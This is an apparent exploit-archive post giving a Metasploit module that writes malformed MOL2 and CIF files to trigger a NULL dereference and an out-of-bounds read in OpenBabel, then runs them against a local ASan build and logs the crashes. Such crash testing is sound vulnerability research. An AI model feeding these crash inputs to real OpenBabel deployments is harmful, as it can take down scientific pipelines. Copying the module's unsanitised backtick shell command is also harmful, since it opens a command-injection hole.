============================================================================================================================================= | # Title : OpenBabel 3.1.1 ASan PoC Tester – Metasploit Auxiliary Module | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) | | # Vendor : https://openbabel.org/index.html | ============================================================================================================================================= [+] Summary : This Metasploit auxiliary module generates specially crafted PoC files targeting potential parsing vulnerabilities in OpenBabel (e.g., NULL pointer dereference and out-of-bounds read conditions). The module executes an AddressSanitizer (ASan)-instrumented build of OpenBabel against the generated files to detect crashes, memory corruption issues, or abnormal termination events. [+] POC : ## # This module requires Metasploit Framework # Tested with Metasploit 6.x ## require 'msf/core' require 'fileutils' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'OpenBabel ASan PoC Tester', 'Description' => %q{ This module generates Proof-of-Concept (PoC) files for known OpenBabel vulnerabilities and tests them using an AddressSanitizer (ASan) build of OpenBabel. It logs crashes for further analysis. }, 'Author' => [ 'Indoushka' ], 'License' => MSF_LICENSE )) register_options( [ OptString.new('BABEL_PATH', [true, 'Path to OpenBabel ASan binary', './obabel']), OptString.new('REPRO_DIR', [true, 'Directory to store PoC files', './repro_files']), OptString.new('LOG_FILE', [true, 'ASan crash log file', 'asan_report.txt']) ] ) end def generate_pocs repro_dir = datastore['REPRO_DIR'] FileUtils.mkdir_p(repro_dir) mol2_content = <<~MOL2 @MOLECULE Null_Pointer_Exploit 1 0 0 0 0 SMALL USER_CHARGES @ATOM 1 C 0.0000 0.0000 0.0000 C.3 1 UNL1 0.0000 @UNITY_ATOM_ATTR 2 0.5 MOL2 cif_content = <<~CIF data_oob_read _cell_length_a 10.0 _cell_length_b 10.0 _cell_length_c 10.0 loop_ _space_group_symop_operation_xyz 'x, y, z' 'x+1, y+2, z+3, w+4, v+5' CIF File.write(File.join(repro_dir, 'repro.mol2'), mol2_content) File.write(File.join(repro_dir, 'repro.cif'), cif_content) print_status("[+] PoC files generated in #{repro_dir}") end def run_test(file_path) babel = datastore['BABEL_PATH'] null_dev = Gem.win_platform? ? 'NUL' : '/dev/null' input_format = File.extname(file_path).delete('.') print_status("Testing file: #{file_path} (#{input_format})") asan_env = { 'ASAN_OPTIONS' => 'symbolize=1:abort_on_error=1:detect_leaks=0' } cmd = "#{babel} -i#{input_format} #{file_path} -osmi -O #{null_dev}" result = '' begin result = `#{asan_env.map{|k,v| "#{k}=#{v}"}.join(' ')} #{cmd} 2>&1` if $?.exitstatus != 0 || result.include?('ERROR: AddressSanitizer') print_good("[!] Potential crash detected!") File.open(datastore['LOG_FILE'], 'a') do |f| f.puts("="*60) f.puts("File: #{file_path}") f.puts("Timestamp: #{Time.now}") f.puts(result) f.puts("\n") end else print_status("No crash detected.") end rescue ::Exception => e print_error("Error executing test: #{e}") end end def run babel = datastore['BABEL_PATH'] unless File.exist?(babel) print_error("OpenBabel binary not found at #{babel}") return end generate_pocs Dir.glob(File.join(datastore['REPRO_DIR'], '*')).each do |file| next unless File.file?(file) run_test(file) end print_status("[+] Testing completed. Report saved to #{datastore['LOG_FILE']}") end end Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================